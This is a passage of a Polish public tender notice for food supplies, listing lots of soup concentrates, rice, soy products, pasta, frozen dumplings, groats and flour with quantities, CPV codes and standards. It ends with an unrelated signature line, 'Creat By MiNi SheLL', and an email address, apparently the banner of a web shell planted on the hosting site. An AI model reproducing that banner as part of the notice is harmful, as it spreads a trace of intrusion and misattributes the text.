13) przyprawa do zup w płynie - o parametrach jakościowych nie gorszych niż przyprawa  MAGI, w opakowaniach jednostkowych nie mniejszych niż 1 l. Szacunkowa ilość zapotrzebowania - 2 500 l. Nomenklatura CPV:15870000-7, Polska Norma: PN-A-86967:1998/Az1:2002
14) rosół z kury - w postaci koncentratu, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 2800 kg. Nomenklatura CPV:15891500-5, Polska Norma: PN-A-94052:1996
15) zupa pieczarkowa - w postaci koncentratu, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 300 kg. Nomenklatura CPV:15891400-4, Polska Norma: PN-A-94050:1996.
16) żurek - w postaci koncentratu, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 500 kg. Nomenklatura CPV:15891400-4, Polska Norma: PN-A-94050:1996.
17) sos grzybowy - w postaci koncentratu, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 300 kg. Nomenklatura CPV: 15871200-6, Polska Norma: PN-A-94050:1996.
18) ryż długoziarnisty biały - w opakowaniach jednostkowych nie mniejszych niż  1kg. Szacunkowa ilość zapotrzebowania 6 000  kg. Nomenklatura CPV:15614100-6, Polska Norma: PN-A-74220:1997, PN-ISO 7301:2004
19) budyń waniliowy - bez cukru, w opakowaniach jednostkowych nie mniejszych niż 5kg. Szacunkowa ilość zapotrzebowania 350  kg. Nomenklatura CPV:15800000-6.
20) kisiel wiśniowy - bez cukru, w opakowaniach jednostkowych nie mniejszych niż 5kg. Szacunkowa ilość zapotrzebowania 300  kg. Nomenklatura CPV:15800000-6.
21) Granulat sojowy - 1 200 kg, pakowany w opakowaniach max. 15kg. CPV: 15890000-3.
22) Kostka sojowa - 600 kg, pakowana w opakowaniach max. 20kg. CPV: 15890000-3.
23) Kotlet sojowy - 350 kg; o wadze 10-20g sztuka i grubości ok. 10 mm, w całości nie pokruszony, pakowany w opakowaniach max. po 10kg. CPV: 15890000-3.
24) czosnek mielony - w opakowaniach jednostkowych 1 kg.  Szacunkowa ilość zapotrzebowania - 45 kg. Nomenklatura CPV: 15870000-7, Polska Norma: PN-A-86967:1998/Az1:2002.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.10.00-4, 15.89.15.00-5, 15.89.00.00-3, 15.86.00.00-4, 15.87.00.00-7, 15.87.12.73-8, 15.86.30.00-5, 15.80.00.00-6, 15.89.14.00-4, 15.87.12.50-1, 15.87.24.00-5, 15.87.21.00-2, 15.87.12.30-5, 15.87.12.00-6, 15.87.11.10-8, 15.87.23.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> GRUPA III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) makaron kolanka - jajeczny, o barwie żółtej, w opakowaniach jednostkowych nie mniejszych niż 10 kg. Szacunkowa ilość zapotrzebowania 5 000 kg. Nomenklatura CPV: 15851100-9, Polska Norma: PN-A-74131:1999.
2) makaron świderki - jajeczny, o barwie żółtej, w opakowaniach jednostkowych nie mniejszych niż 10 kg. Szacunkowa ilość zapotrzebowania 5 000 kg. Nomenklatura CPV: 15851100-9, Polska Norma: PN-A-74131:1999.
3) makaron wstążki - jajeczny, o barwie żółtej, w opakowaniach jednostkowych nie mniejszych niż10 kg. Szacunkowa ilość zapotrzebowania 3 000 kg. Nomenklatura CPV: 15851100-9, Polska Norma: PN-A-74131:1999..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> GRUPA IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) pierogi - nadziewane serem, mrożone, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 380 kg. Nomenklatura CPV:15894000-1.
2) pyzy ziemniaczane - mrożone, w opakowaniach jednostkowych nie mniejszych niż 3 kg Szacunkowa ilość zapotrzebowania 3 500 kg. Nomenklatura CPV:15894000-1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.40.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> GRUPA V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) kasza jęczmienna średnioziarnista - w opakowaniach jednostkowych nie mniejszych niż 1kg. Szacunkowa ilość zapotrzebowania 3 500  kg. Nomenklatura CPV: 15613000-8, Polska Norma:        PN-87/A-74203
2) kasza manna - w opakowaniach jednostkowych nie mniejszych niż  1kg. Szacunkowa ilość zapotrzebowania 2 800 kg. Nomenklatura CPV: 15613000-8, Polska Norma: PN-88/A-74036
3) mąka pszenna typ 550 - w opakowaniach jednostkowych nie mniejszych niż 1kg. Szacunkowa ilość zapotrzebowania 5 800  kg. Nomenklatura CPV:15612100-2 , Polska Norma: PN-A-74022:2003.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.30.00-8, 15.61.21.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com